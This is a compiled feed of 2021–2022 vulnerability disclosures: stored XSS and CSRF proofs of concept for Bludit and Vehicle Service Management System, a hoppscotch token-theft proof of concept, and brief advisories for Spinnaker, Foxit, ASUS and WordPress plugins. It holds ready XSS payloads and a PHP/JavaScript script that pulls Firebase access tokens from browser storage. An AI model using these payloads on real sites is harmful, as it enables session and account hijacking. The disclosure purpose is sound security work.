A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel.

**Bludit 3.13.1 - TAGS Field Stored Cross Site Scripting (XSS)**

Bludit 3.13.1 - TAGS Field Stored Cross Site Scripting (XSS)

**Exploit Title: Bludit 3.13.1 - TAGS Field Stored Cross Site Scripting (XSS)****Date: 20/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.bludit.com****Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip****Version: <= 3.13.1****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/bludit-3-13-1-tags-field-stored-cross-site-scripting-xss
*   https://github.com/plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS

**Steps to Reproduce:**

1.  Login to the admin panel http://localhost/admin
2.  Navigate to New content section.
3.  Enter the title of the post Ex:test
4.  Click on the Options button.
5.  Navigate to Advanced tab and inject the payload "><script>alert("XSS")</script> in TAGS section.
6.  Click on Save button.
7.  Open the post(test).
8.  Malicious javascript code triggered.

CVE-2021-45744: GitHub - plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS: Bludit 3.13.1 - TAGS Field Stored Cross Site Scripting (XSS)

A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.

**Vehicle Service Management System - 'MyAccount' Stored Cross Site Scripting (XSS)**

Vehicle Service Management System - 'MyAccount' Stored Cross Site Scripting (XSS)

**Exploit Title: Vehicle Service Management System - 'MyAccount' Stored Cross Site Scripting (XSS)****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss/
*   https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS

**Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to My Account section http://localhost/vehicle\_service/admin/?page=user
3.  Inject the payload "><script>alert(document.cookie)</script> in First Name & Last Name input field.
4.  Click on update button.
5.  Malicious javascript code triggered.

CVE-2021-46068: GitHub - plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS: Vehicle Service Management System - 'MyAccount' Stored Cross Site Scripting (XSS)

A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel.

**Bludit 3.13.1 - About Plugin Stored Cross Site Scripting (XSS)**

Bludit 3.13.1 - About Plugin Stored Cross Site Scripting (XSS)

**Exploit Title: Bludit 3.13.1 - About Plugin Stored Cross Site Scripting (XSS)****Date: 20/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.bludit.com****Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip****Version: <= 3.13.1****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/bludit-3-13-1-about-plugin-stored-cross-site-scripting-xss
*   https://github.com/plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS

**Steps to Reproduce:**

1.  Login to the admin panel http://localhost/admin
2.  Navigate to Themes section.
3.  Activate the Blog X theme.
4.  Navigate to plugins section.
5.  In About plugin click the Settings button.
6.  Inject the payload "><script>alert("XSS")</script> in About section.
7.  Click on Save button.
8.  Visit the site.
9.  Malicious javascript code triggered.

CVE-2021-45745: GitHub - plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS: Bludit 3.13.1 - About Plugin Stored Cross Site Scripting (XSS)

A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.

**Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Stored Cross Site Scripting (XSS)**

Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Stored Cross Site Scripting (XSS)

**Exploit Title: Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Stored Cross Site Scripting (XSS)****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-multiple-cross-site-request-forgery-csrf-leads-to-stored-cross-site-scripting-xss
*   https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS

**1\. Vehicle Service Management System - 'Mechanic List' (/admin/?page=mechanics)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Mechanic List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Full Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Mechanic List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**2\. Vehicle Service Management System - 'Service Requests' (/admin/?page=service\_requests)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Service Requests section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Owner Contact input field.
7.  Click on Save Request button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Service Requests section in Browser B (Firefox).
12.  Choose the newly created Service Requests and click on Action under View.
13.  Malicious javascript code triggered.

**3\. Vehicle Service Management System - 'Category List' (/admin/?page=maintenance/category)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Category List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Category Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Category List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**4\. Vehicle Service Management System - 'Service List' (/admin/?page=maintenance/services)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Service List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Service Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Service List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**5\. Vehicle Service Management System - 'User List' (/admin/?page=user/list)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the User List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in First Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the User List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**6\. Vehicle Service Management System - 'Settings' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Settings section.
6.  Inject the payload "><script>alert(document.cookie)</script> in System Name input field.
7.  Click on Update button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Settings section in Browser B (Firefox).
12.  Malicious javascript code triggered.

CVE-2021-46080: GitHub - plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS: Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Store

hoppscotch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor

**Description**

Steal authorization token via xss and hijack attack

**Proof of Concept**

Using this attack , attacker can hijack account by stealing authorization header . I see there is team based collaboration exists ,so one user can hack other user account using this bug .

**STEP**

First host bellow php file in your webserver

    // cors2.php
    <?php
        if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
            header('Access-Control-Allow-Origin: *');
            header('Access-Control-Allow-Methods: POST, GET, DELETE, PUT, PATCH, OPTIONS');
            header('Access-Control-Allow-Headers: *');
            header('Access-Control-Max-Age: 1728000');
            header('Content-Length: 0');
            header('Content-Type: text/plain');
            die();
        }
    
        header('Access-Control-Allow-Origin: *');
        //header('Content-Type: application/json');
         header('Content-Type: text/html');
        //header("Location: http://mysite.com/cors.php");
     //   $ret = [
       //     'result' => 'OK',
        //];
       // print json_encode($ret);
        //echo "chut\"'><img src=x onerror=alert(document.cookie)>";
        echo '<script>//alert();
    var dbs=window.indexedDB.open("firebaseLocalStorageDb",1);
    dbs.onsuccess = function(event) {
      db = event.target.result;
      var tt=db.transaction(["firebaseLocalStorage"]).objectStore("firebaseLocalStorage")
    var tt2=tt.getAllKeys();
    //console.log(tt2)
     tt2.onsuccess=function(yy){
      keyss=yy.target.result[0];//alert(keyss)
      var mm=tt.get(keyss);//console.log(mm)
     mm.onsuccess=function(kk){
     var xx=kk.target.result.value.stsTokenManager.accessToken
      alert(xx)
      }
      }
    };
    </script>
             ';
    ?>
    
    

Lets your webserver url is http://mysite.com/cors2.php  
Now login to you account and fetch above url and preview the request and see xss is executed and it will fetch authorization token .

**VIDEO POC**

https://drive.google.com/file/d/1JLFiL0S9YLYjPNleoTOoQZQOylDfXfwn/view?usp=sharing

**SUGGESTED FIX**

When you previewing as html then render it in sandbox , so that it cant acccess authorization token . Simply create a div element with sandbox attribute and render the response there .

**Impact**

Full account hijack by stealing Authorization token

CVE-2022-0121: Exposure of Sensitive Information to an Unauthorized Actor in hoppscotch

Spinnaker is an open source, multi-cloud continuous delivery platform. A path traversal vulnerability was discovered in uses of TAR files by AppEngine for deployments. This uses a utility to extract files locally for deployment without validating the paths in that deployment don't override system files. This would allow an attacker to override files on the container, POTENTIALLY introducing a MITM type attack vector by replacing libraries or injecting wrapper files. Users are advised to update as soon as possible. For users unable to update disable Google AppEngine deployments and/or disable artifacts that provide TARs.

**Impact**

A path traversal vulnerability was discovered in uses of TAR files by AppEngine for deployments. This uses a utility to extract files locally for deployment without validating the paths in that deployment don't override system files. This would allow an attacker to override files on the container, POTENTIALLY introducing a MITM type attack vector by replacing libraries or injecting wrapper files.

**Patches**

Incoming...

**Workarounds**

Disable Google AppEngine deployments and/or disable artifacts that provide TARs.

**References**

To be updated. Reference examples:  
https://bugzilla.redhat.com/show\_bug.cgi?id=1584388

Code area (as of release 1.26):  
https://github.com/spinnaker/clouddriver/blob/release-1.26.x/clouddriver-appengine/src/main/java/com/netflix/spinnaker/clouddriver/appengine/artifacts/ArtifactUtils.java

**For more information**

Email security@spinnaker.io

CVE-2021-39143: Build software better, together

Foxit PDF Reader and PDF Editor before 11.1 on macOS allow remote attackers to execute arbitrary code via getURL in the JavaScript API.

CVE-2021-45980: Security Bulletins | Foxit Software

Invalid input sanitizing leads to reflected Cross Site Scripting (XSS) in ASUS RT-AC52U_B1 3.0.0.4.380.10931 can lead to a user session hijack.

Inga filer i den här mappen.Logga in för att lägga till filer i den här mappen

CVE-2021-46109: ASUS – Google Drive

The UpdraftPlus WordPress Backup Plugin WordPress plugin before 1.16.66 does not sanitise and escape the backup_timestamp and job_id parameter before outputting then back in admin pages, leading to Reflected Cross-Site Scripting issues

CVE-2021-25022: Changeset 2635585 for updraftplus – WordPress Plugin Repository

The OMGF | Host Google Fonts Locally WordPress plugin before 4.5.12 does not validate the cache directory setting, allowing high privilege users to use a path traversal vector and delete arbitrary folders when uninstalling the plugin

Tag

#google